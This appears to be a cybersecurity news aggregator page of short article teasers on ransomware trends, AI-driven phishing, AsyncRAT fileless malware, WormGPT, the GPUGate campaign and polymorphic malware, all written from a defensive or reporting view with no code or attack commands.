Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

Ransomware Techniques Are Changing. Are MSPs Ready for This Shift?

Ransomware is evolving ‒ not fading. Despite a decline in attack detections based on WatchGuard Firebox telemetry, data from extortion sites and media reporting tells a different story: ransomware activity is actually on the rise, both quarter-over-quarter and year-over-year. The number of active ransomware groups is also increasing, as is the average ransom demand. In fact, the typical payout jumped from $400,000 in 2023 to $2 million in 2024 ‒ a staggering 500% spike.

Report: AI-Powered Phishing Fuels Ransomware Losses

AI-powered social engineering attacks are significantly more successful than traditional attacks, according to a new report from cyber risk management firm Resilience. The researchers state, “Social engineering attacks fueled 88% of material losses, with AI-powered phishing achieving a 54% success rate compared to just 12% for traditional attempts.” AI allows attackers to easily craft sophisticated phishing emails, as well as voice and video deepfakes.

AsyncRAT in Action: Fileless Malware Techniques and Analysis of a Remote Access Trojan

Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution. This approach bypasses traditional disk-based detection by operating in memory, making these threats harder to detect, analyze, and eradicate. A recent incident culminated in the deployment of AsyncRAT, a powerful Remote Access Trojan (RAT), through a multi-stage fileless loader. In this blog, we share some of the key takeaways from this investigation.

Intel Chat: Salt Typhoon, Scattered LapSus Hunters, WhatsApp compromise & AI-assisted attack [245]

Support our show by sharing your favorite episodes with a friend, subscribe, give us a rating or leave a comment on your podcast platform. This podcast is brought to you by LimaCharlie, maker of the SecOps Cloud Platform, infrastructure for SecOps where everything is built API first. Scale with confidence as your business grows.

How to Defend Against WormGPT-Driven Phishing and Malware

AI is unlocking new ways to work across industries. Nearly four in five CEOs are implementing or likely to implement generative AI to speed up innovation across their companies, and workers at every level are using GenAI to improve or expand their processes. Unfortunately, they aren’t the only ones embracing the power of AI. WormGPT was one of the best-known early examples of an AI that could create convincing social engineering attacks and build malware.

Less ransomware, same risk. How can it be prevented?

Just because ransomware attacks have decreased doesn’t mean that the risk has disappeared. Indeed, it remains one of the most disruptive threats to any organisation. Headlines can convey a false sense of relief: Ransomware attacks are down 15%, according to Verizon's latest DBIR report. But for those of us who work in cybersecurity, we know that this doesn't tell the whole story, especially when the real issue isn't how often an attack occurs, but what happens when it does.

GPUGate Malware: Malicious GitHub Desktop Implants Use Hardware-Specific Decryption, Abuse Google Ads to Target Western Europe

On 19 August 2025, the Arctic Wolf Cybersecurity Operations Center (cSOC) uncovered and remediated a sophisticated delivery chain: a threat actor leveraged GitHub’s repository structure together with paid placements on Google Ads to funnel users toward a malicious download hosted on a lookalike domain. By embedding a commit‑specific link in the advertisement, the attackers made the download appear to originate from an official source, effectively sidestepping typical user scrutiny.

Adversarial AI and Polymorphic Malware: A New Era of Cyber Threats

The state of cybersecurity has always been in flux, but the arrival of tools like ChatGPT heralded one of the most significant challenges for security teams in years. AI has the potential to unlock incredible potential in data processing and malware detection, but in the wrong hands, Large Language Models (LLMs) and other adversarial AI tools can be used to develop polymorphic malware that can escape detection, gain access to sensitive data, and poison data sets.